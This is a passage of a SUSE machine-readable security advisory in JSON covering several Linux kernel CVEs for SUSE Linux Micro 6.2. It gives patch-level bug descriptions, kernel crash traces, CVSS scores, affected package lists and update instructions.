{
"category": "external",
"summary": "CVE-2025-71131",
"url": "https://www.suse.com/security/cve/CVE-2025-71131"
},
{
"category": "external",
"summary": "SUSE Bug 1256742 for CVE-2025-71131",
"url": "https://bugzilla.suse.com/1256742"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-71131"
},
{
"cve": "CVE-2025-71132",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71132"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmc91x: fix broken irq-context in PREEMPT_RT\n\nWhen smc91x.c is built with PREEMPT_RT, the following splat occurs\nin FVP_RevC:\n\n[ 13.055000] smc91x LNRO0003:00 eth0: link up, 10Mbps, half-duplex, lpa 0x0000\n[ 13.062137] BUG: workqueue leaked atomic, lock or RCU: kworker/2:1[106]\n[ 13.062137] preempt=0x00000000 lock=0-\u003e0 RCU=0-\u003e1 workfn=mld_ifc_work\n[ 13.062266] C\n** replaying previous printk message **\n[ 13.062266] CPU: 2 UID: 0 PID: 106 Comm: kworker/2:1 Not tainted 6.18.0-dirty #179 PREEMPT_{RT,(full)}\n[ 13.062353] Hardware name: , BIOS\n[ 13.062382] Workqueue: mld mld_ifc_work\n[ 13.062469] Call trace:\n[ 13.062494] show_stack+0x24/0x40 (C)\n[ 13.062602] __dump_stack+0x28/0x48\n[ 13.062710] dump_stack_lvl+0x7c/0xb0\n[ 13.062818] dump_stack+0x18/0x34\n[ 13.062926] process_scheduled_works+0x294/0x450\n[ 13.063043] worker_thread+0x260/0x3d8\n[ 13.063124] kthread+0x1c4/0x228\n[ 13.063235] ret_from_fork+0x10/0x20\n\nThis happens because smc_special_trylock() disables IRQs even on PREEMPT_RT,\nbut smc_special_unlock() does not restore IRQs on PREEMPT_RT.\nThe reason is that smc_special_unlock() calls spin_unlock_irqrestore(),\nand rcu_read_unlock_bh() in __dev_queue_xmit() cannot invoke\nrcu_read_unlock() through __local_bh_enable_ip() when current-\u003esoftirq_disable_cnt becomes zero.\n\nTo address this issue, replace smc_special_trylock() with spin_trylock_irqsave().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71132",
"url": "https://www.suse.com/security/cve/CVE-2025-71132"
},
{
"category": "external",
"summary": "SUSE Bug 1256737 for CVE-2025-71132",
"url": "https://bugzilla.suse.com/1256737"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-71132"
},
{
"cve": "CVE-2025-71133",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71133"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nRDMA/irdma: avoid invalid read in irdma_net_event\n\nirdma_net_event() should not dereference anything from \"neigh\" (alias\n\"ptr\") until it has checked that the event is NETEVENT_NEIGH_UPDATE.\nOther events come with different structures pointed to by \"ptr\" and they\nmay be smaller than struct neighbour.\n\nMove the read of neigh-\u003edev under the NETEVENT_NEIGH_UPDATE case.\n\nThe bug is mostly harmless, but it triggers KASAN on debug kernels:\n\n BUG: KASAN: stack-out-of-bounds in irdma_net_event+0x32e/0x3b0 [irdma]\n Read of size 8 at addr ffffc900075e07f0 by task kworker/27:2/542554\n\n CPU: 27 PID: 542554 Comm: kworker/27:2 Kdump: loaded Not tainted 5.14.0-630.el9.x86_64+debug #1\n Hardware name: [...]\n Workqueue: events rt6_probe_deferred\n Call Trace:\n \u003cIRQ\u003e\n dump_stack_lvl+0x60/0xb0\n print_address_description.constprop.0+0x2c/0x3f0\n print_report+0xb4/0x270\n kasan_report+0x92/0xc0\n irdma_net_event+0x32e/0x3b0 [irdma]\n notifier_call_chain+0x9e/0x180\n atomic_notifier_call_chain+0x5c/0x110\n rt6_do_redirect+0xb91/0x1080\n tcp_v6_err+0xe9b/0x13e0\n icmpv6_notify+0x2b2/0x630\n ndisc_redirect_rcv+0x328/0x530\n icmpv6_rcv+0xc16/0x1360\n ip6_protocol_deliver_rcu+0xb84/0x12e0\n ip6_input_finish+0x117/0x240\n ip6_input+0xc4/0x370\n ipv6_rcv+0x420/0x7d0\n __netif_receive_skb_one_core+0x118/0x1b0\n process_backlog+0xd1/0x5d0\n __napi_poll.constprop.0+0xa3/0x440\n net_rx_action+0x78a/0xba0\n handle_softirqs+0x2d4/0x9c0\n do_softirq+0xad/0xe0\n \u003c/IRQ\u003e",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71133",
"url": "https://www.suse.com/security/cve/CVE-2025-71133"
},
{
"category": "external",
"summary": "SUSE Bug 1256733 for CVE-2025-71133",
"url": "https://bugzilla.suse.com/1256733"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-71133"
},
{
"cve": "CVE-2025-71135",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71135"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmd/raid5: fix possible null-pointer dereferences in raid5_store_group_thread_cnt()\n\nThe variable mddev-\u003eprivate is first assigned to conf and then checked:\n\n conf = mddev-\u003eprivate;\n if (!conf) ...\n\nIf conf is NULL, then mddev-\u003eprivate is also NULL. In this case,\nnull-pointer dereferences can occur when calling raid5_quiesce():\n\n raid5_quiesce(mddev, true);\n raid5_quiesce(mddev, false);\n\nsince mddev-\u003eprivate is assigned to conf again in raid5_quiesce(), and conf\nis dereferenced in several places, for example:\n\n conf-\u003equiesce = 0;\n wake_up(\u0026conf-\u003ewait_for_quiescent);\n\nTo fix this issue, the function should unlock mddev and return before\ninvoking raid5_quiesce() when conf is NULL, following the existing pattern\nin raid5_change_consistency_policy().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71135",
"url": "https://www.suse.com/security/cve/CVE-2025-71135"
},
{
"category": "external",
"summary": "SUSE Bug 1256761 for CVE-2025-71135",
"url": "https://bugzilla.suse.com/1256761"
}
],
"remediations": [
{
"category": "vendor_fix",
